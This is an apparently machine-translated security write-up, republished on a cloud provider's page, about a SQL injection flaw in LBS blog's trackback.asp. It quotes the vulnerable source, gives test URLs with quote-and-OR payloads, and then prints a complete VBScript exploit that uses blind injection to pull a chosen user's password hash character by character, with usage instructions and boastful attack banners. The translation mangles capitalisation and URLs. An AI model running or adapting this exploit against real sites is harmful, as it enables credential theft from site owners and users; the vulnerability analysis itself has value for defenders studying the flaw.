Analysis of LBS blog trackback injection vulnerability and exp

Source: Internet
Author: User
Injection in source/src_trackback.asp

Function trackbacksave (){

VaR tbentry = {"log_id": input ["ID"],
"Url": input ["url"],
"Title": input ["title"],
"Excerpt": input ["Excerpt"],
"Blog": input ["blog_name"]
}

// These function calllook really horrible
Tbentry. log_id = func. checkint (tbentry. log_id );
Tbentry. url = func. Trim (func. wordfilter (func. checkurl (tbentry. url )));
Tbentry. Title = func. Trim (func. wordfilter (func. trimhtml (func. trimubb (tbentry. Title ))));
Tbentry. Excerpt = func. Trim (func. wordfilter (func. trimhtml (func. trimubb (tbentry. Excerpt ))));
Tbentry. Blog = func. Trim (func. wordfilter (func. trimhtml (func. trimubb (tbentry. Blog ))));

If (tbentry. Title = "") tbentry. Title = tbentry. url;

// Better leave the error messages below in English
If (! Tbentry. log_id)
Trackbackresponse (1, "invalid Article ID ");
If (tbentry. url = "")
Trackbackresponse (1, "source URL is blank ");
If (tbentry. url = false | tbentry. Title = false | tbentry. Excerpt = false | tbentry. Blog = false)
Trackbackresponse (1, "content contains blocked words ");

VaR tmpa = connblog. Query ("select count (log_id) As I from blog_article where log_locked = false and log_mode <4 and log_id =" + tbentry. log_id );
If (tmpa [0] ["I"] = 0) trackbackresponse (1, "Article does not exist or is locked ");
Tmpa = connblog. query ("select count (tb_id) As I from blog_trackback where tb_title = '" + tbentry. title + "'and tb_excerpt ='" + tbentry. excerpt + "'");
If (tmpa [0] ["I"]> 0) trackbackresponse (1, "trackback is already saved ");

// Saving trackback

Note:

Tbentry. log_id = func. checkint (tbentry. log_id );
Tbentry. url = func. Trim (func. wordfilter (func. checkurl (tbentry. url )));
Tbentry. Title = func. Trim (func. wordfilter (func. trimhtml (func. trimubb (tbentry. Title ))));
Tbentry. Excerpt = func. Trim (func. wordfilter (func. trimhtml (func. trimubb (tbentry. Excerpt ))));
Tbentry. Blog = func. Trim (func. wordfilter (func. trimhtml (func. trimubb (tbentry. Blog ))));

Log_id is checked as int type, but what about URL and excerpt? It's just wordfilter, tril, and HTML sensitive things that have no impact on injection. These things are from
VaR tbentry = {"log_id": input ["ID"],
"Url": input ["url"],
"Title": input ["title"],
"Excerpt": input ["Excerpt"],
"Blog": input ["blog_name"]
}

In input ~~~~, Obviously, an injection!

Because of the special nature of injection, we need to use or, which is a character-type injection.

Http: // 127.0.0.1/aspscripts/lbs2.0.311/lbs/trackback. asp? Url = 1 & id = 1 & blog_name = fffff & excerpt = 1111 '% 20or % 20 '1' = '1
Http: // 127.0.0.1/aspscripts/lbs2.0.311/lbs/trackback. asp? Url = 1 & id = 1 & blog_name = fffff & excerpt = 1111 '% 20or % 20 '1' = '2

This shows the effect.

The identifier is trackback is already saved.

Well, the exploit should also come out.

'================================================ ============================================
'Usage instructions:
'At the command prompt:
'Cscript.exe lbsblog. vbs: the password of the blog user to be cracked in the blog path of the website to be attacked
For example:
'Cscript.exe lbsblog. vbs www.xxxx.com/bbs/boke.asp Admin
'By loveshell
'================================================ ============================================
On Error resume next
Dim oargs
Dim olbsxml'xmlhttp object used to open the target URL
Dim targeturl' target URL
Dim userid' blog User Name
Dim tempstr 'store some obtained MD5 passwords
Dim charhex' defines hexadecimal characters
Dim charset

Set oargs = wscript. Arguments
If oargs. Count <> 2 then call showusage ()

Set olbsxml = Createobject ("Microsoft. XMLHTTP ")

'Fill in the complete target URL
TargetUrl = oargs (0)
If lcase (left (TargetUrl, 7) <> "http: //" then TargetUrl = "http: //" & TargetUrl
If right (TargetUrl, 1) <> "/" then TargetUrl = TargetUrl &"/"
TargetUrl = TargetUrl & "trackback. asp"

Userid = oargs (1)
Tempstr = ""
Charhex = Split (", A, B, C, D, E, F ",",")

Wscript. Echo "lbs blog all version exploit [new injection vulnerability]" & vbcrlf
Wscript. Echo "by Jianxin" & vbcrlf
Wscript. Echo "http://www.loveshell.net /~ _~ I'm really bored... "& vbcrlf
Wscript. Echo "+ Fuck the site now" & vbcrlf

Call Main (TargetUrl, blogname)

Set obokexml = nothing

'---------------------------------------------- Sub -------------------------------------------------------
'================================================ =====
'Function name: Main
'Function function: main program, injection to obtain the password of the blog user
'================================================ =====
Sub main (TargetUrl, blogname)
Dim mainoffset, suboffset, templen, Openurl, getpage
For mainoffset = 1 to 40
For suboffset = 0 to 15
Templen = 0
Postdata = ""
Postdata = "'or (select left (user_password," & mainoffset & ") from blog_user where user_id =" & userid & ") ='" & tempstr & charhex (suboffset) & "'and '1' = '1"
 
Openurl = TargetUrl

Olbsxml. Open "Post", Openurl, false ,"",""
Olbsxml. setRequestHeader "Content-Type", "application/X-WWW-form-urlencoded"
Olbsxml. Send "url = http://www.loveshell.net/blog/&id=1&blog_name=loveshell_is_my_hero&excerpt=fuck" & escape (postdata)
Getpage = bytestobstr (olbsxml. responsebody)
'Determine whether the accessed page exists
'Wscript. Echo getpage
If instr (getpage, "trackback is already saved") <> 0 then
Tempstr = tempstr & charhex (suboffset)
Wscript. Echo "+ crack now:" & tempstr & string (40-mainoffset ,"? ")
Exit
Elseif instr (getpage, "trackback disabled") <> 0 then
Wscript. Echo vbcrlf & "Something error, not vul" & vbcrlf
Wscript. Quit
End if
Next
Next
Wscript. Echo vbcrlf & "+ We Got it:" & tempstr & vbcrlf & ": P don't be edevil"
End sub

'================================================ =====
'Function name: bytestobstr
'Function: Convert the content in the XMLHTTP object to gb2312 encoding.
'================================================ =====
Function bytestobstr (Body)
Dim objstream
Set objstream = Createobject ("ADODB. Stream ")
Objstream. type = 1
Objstream. mode = 3
Objstream. Open
Objstream. Write body
Objstream. Position = 0
Objstream. type = 2
Objstream. charset = "gb2312"
Bytestobstr = objstream. readtext
Objstream. Close
Set objstream = nothing
End Function

'==================================
'Function name: showusage
'Function: usage tips
'==================================
Sub showusage ()
Wscript. Echo "lbs blog exploit" & vbcrlf & "by loveshell/Jianxin"
Wscript. Echo "Usage:" & vbcrlf & "cscript" & wscript. scriptfullname & "TargetUrl userid"
Wscript. Echo "Example:" & vbcrlf & "cscript" & wscript. scriptfullname & "http://www.loveshell.net/1"
Wscript. Echo ""
Wscript. Quit
End sub

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.